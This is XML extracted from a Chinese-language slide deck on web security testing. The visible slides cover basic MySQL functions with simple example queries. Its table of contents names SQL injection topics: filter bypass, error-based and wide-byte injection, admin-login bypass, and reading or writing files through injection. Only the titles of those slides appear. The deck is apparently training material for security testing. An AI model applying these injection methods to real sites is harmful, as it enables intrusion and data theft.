              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从文本字段中提取字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT MID(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name,start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[,length]) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name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err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>必需。要提取字符的字段。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>start	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>必需。规定开始位置（起始值是 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length	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可选。要返回的字符数。如果省略，则 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MID() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数返回剩余文本。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960" y="4388820"/>
            <a:ext cx="4219048" cy="1590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limit()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回前几条或者中间某几行数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select * from table limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>m,n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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指记录始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>index0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>始表示第条记录 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>m+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>条始取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>n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select * from user limit 1,2;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Count()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>聚集函数，统计表的行数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rand()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用于产生一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0~1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的随机数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>floor()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向下取整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99" y="3664896"/>
            <a:ext cx="3219048" cy="12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27" y="4606157"/>
            <a:ext cx="3380952" cy="1495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359" y="216201"/>
            <a:ext cx="6034405" cy="632460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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359" y="848661"/>
            <a:ext cx="10799011" cy="491427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group by---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>依据我们想要的规则对结果进行分组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select * from user group by host;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>length()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回字符串的长度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select length('www.cracer.com');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>截取字符串 三个参数 （所要截取字符串，截取的位置，截取的长度）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(host,2,3) from user; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从第二位开始往后连续取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endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回字符串的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Select ascii(‘a’);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loadfile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读取文件内容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outfile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7962</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>329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Times New Roman</vt:lpstr>
      <vt:lpstr>方正综艺简体</vt:lpstr>
      <vt:lpstr>Levenim MT</vt:lpstr>
      <vt:lpstr>Yu Gothic UI</vt:lpstr>
      <vt:lpstr>Kozuka Gothic Pro EL</vt:lpstr>
      <vt:lpstr>Yu Gothic UI Light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Mysql 介绍</vt:lpstr>
      <vt:lpstr>常见的sql语句</vt:lpstr>
      <vt:lpstr>Mysql 函数</vt:lpstr>
      <vt:lpstr>相关函数</vt:lpstr>
      <vt:lpstr>相关函数</vt:lpstr>
      <vt:lpstr>相关函数</vt:lpstr>
      <vt:lpstr>Mysql注释</vt:lpstr>
      <vt:lpstr>数据库结构对比</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Mysql 注入原理</vt:lpstr>
      <vt:lpstr>常见的防注入代码</vt:lpstr>
      <vt:lpstr>绕过防注入代码</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>显错注入</vt:lpstr>
      <vt:lpstr>显错注入</vt:lpstr>
      <vt:lpstr>显错注入</vt:lpstr>
      <vt:lpstr>显错注入</vt:lpstr>
      <vt:lpstr>后台绕过</vt:lpstr>
      <vt:lpstr>Mysql长字节截断攻击</vt:lpstr>
      <vt:lpstr>Mysql宽字节注入</vt:lpstr>
      <vt:lpstr>宽字节注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Mysql注入读写文件</vt:lpstr>
      <vt:lpstr>获取根目录</vt:lpstr>
      <vt:lpstr>读取网站文件内容</vt:lpstr>
      <vt:lpstr>写入函数 into outfile   用的比较多</vt:lpstr>
      <vt:lpstr>写入函数 into outfile   用的比较多</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>注入工具的使用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WEB安全测试</dc:title>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-02T07:18:07Z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